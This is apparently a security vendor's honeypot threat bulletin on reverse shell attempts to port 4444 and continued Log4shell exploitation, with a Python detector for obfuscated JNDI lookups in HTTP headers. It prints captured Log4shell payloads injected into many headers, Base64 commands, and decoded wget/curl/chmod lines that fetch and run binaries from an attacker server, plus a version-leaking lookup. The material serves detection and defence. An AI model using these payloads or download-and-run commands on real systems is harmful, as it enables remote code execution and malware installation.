Summary
Reverse shell attempts on port 4444
This week, the top 10 IP addresses launching malicious activity against the TEHTRIS honeypot network include the following two:
- 212.2.236[.]244 – AS 62164 (Heymman Servers Corporation) – US
- 23.140.88[.]145 – AS 62164 (Heymman Servers Corporation) – US
Both IP addresses are already flagged as malicious in public databases. They performed 1,275 attempts in a single morning, on 19 October 2022, across Europe, mostly against German, Lithuanian and Finnish infrastructure.
The payload then initiates a connection to 45.85.219[.]125:4444, an address located in Germany (hosted by AS 44486 SYNLINQ) that is not yet listed in public databases.
Port 4444 (TCP and UDP) is commonly associated with Trojans and malware in general because it is the default listener port of the widely used Metasploit reverse shell payloads. It is recommended to block incoming traffic towards this port; note that in the case above the compromised host connects outbound to port 4444, so egress filtering and alerting on outbound connections to this port are just as relevant.
Log4shell still actively exploited
CVE-2021-44228 (CVSS v3: 10), also known as Log4shell, allows a threat actor to achieve remote code execution (RCE). This particularly critical vulnerability affects Apache Log4j, a logging library for Java. Log4j records and collects events occurring in Java applications, for example every request sent to a website. Because Log4j evaluates lookup expressions inside logged strings, an attacker can inject expressions that resolve variables (environment variables, system properties) and display their content. The flaw is not directly exploitable in a single step: the injected lookup makes the vulnerable server call an attacker-controlled C2 server, from which it downloads code.
Example of a payload captured in one request; the ${env:BARFOO:-x} lookups resolve to their default value on the target, so the string evaluates to ${jndi:ldap://168.138.128[.]171:1389/...}:
t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY2htb2QgNzc3IG9wZW52cG47IC4vb3BlbnZwbiBydW5uZXI=}')
The Base64 segment decodes to the following command:
wget hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
curl -O hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
chmod 777 openvpn; ./openvpn runner
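As an added example (not code from the TEHTRIS report), a small Python scanner that de-obfuscates the nested ${env:NAME:-x} lookups seen in the payload above, flags the resulting ${jndi:...} lookup in any HTTP header, and decodes the Base64 command carried in the TomcatBypass path. The sample headers are constructed around the payload captured above; the handling of ${lower:}/${upper:} lookups and the set of JNDI schemes are assumptions about common variants, not something the report states.

```python
import base64
import binascii
import re

# Inner lookups with a default, e.g. ${env:BARFOO:-j}: the variable is unset on the
# target, so Log4j substitutes the default ("j"). The scanner does the same.
_DEFAULT_LOOKUP = re.compile(r"\$\{(?:env|sys|date|ctx|main|java):[^${}]*?:-([^${}]*)\}")
# Case lookups such as ${lower:J} -> j (assumed common variant, not on the page).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)([^}]*)\}", re.I)
_B64_CMD = re.compile(r"/Command/Base64/([A-Za-z0-9+/=]+)")

def normalize_lookups(value: str) -> str:
    """Collapse nested obfuscation lookups until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
        value = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(), value)
    return value

def decode_command(path: str):
    """Decode the command carried by a .../Command/Base64/<b64> path, or None."""
    m = _B64_CMD.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):  # truncated or malformed Base64
        return None

def scan_headers(headers: dict) -> list:
    """One (header, scheme, host, decoded command) tuple per JNDI lookup found."""
    hits = []
    for name, raw in headers.items():
        for m in _JNDI.finditer(normalize_lookups(raw)):
            hits.append((name, m.group(1).lower(), m.group(2), decode_command(m.group(3))))
    return hits

# Constructed sample request carrying the payload captured on the TEHTRIS honeypot
# (attacker IP defanged with [.] exactly as in the report).
SAMPLE_HEADERS = {
    "user-agent": "Mozilla/5.0",
    "x-api-version": "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}"
                     "//168.138.128[.]171:1389/TomcatBypass/Command/Base64/"
                     "d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY2htb2QgNzc3IG9wZW52cG47IC4vb3BlbnZwbiBydW5uZXI=}')",
}
```

Running scan_headers(SAMPLE_HEADERS) yields one hit naming the header, the ldap scheme, the attacker host 168.138.128[.]171:1389 and the decoded wget/curl/chmod command, which is what a WAF or SIEM rule should key on rather than the literal string "${jndi:".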
["x-api-version: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"bearer: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"x-client-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
'connection: close',
"cf-connecting_ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
'accept: application/json, text/plain, */*',
"authentication: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"originating-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"x-real-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')"]
Here, the attacker tried several ways to exploit the vulnerability, injecting the same lookup into multiple HTTP headers of a single request.
Two other examples of known requests that attempt to exploit this CVE:
${jndi:ldap[:]//127.0.0.1[:]389/5j9gclyhuddf8k1712mm0mkwn8kb3h6u/${java:os}/${sys:java.vendor}_${sys:java.version}}
${jndi:ldap[:]//168.138.128.171[:]1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}
The first request leaks the operating system and Java vendor/version to the attacker's server; the Base64 segment of the second decodes to the following command:
wget http[:]//168.138.128.171/perl/idsha1game;
curl -O http[:]//168.138.128.171/perl/idsha1game;
chmod 777 idsha1game; ./idsha1game runner
For more details, see the alert published by the French National Cybersecurity Agency (ANSSI): https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/
This CVE has made a lot of noise since its discovery at the end of 2021 and is still actively exploited one year later.
TEHTRIS recommends that you always apply updates as soon as they become available.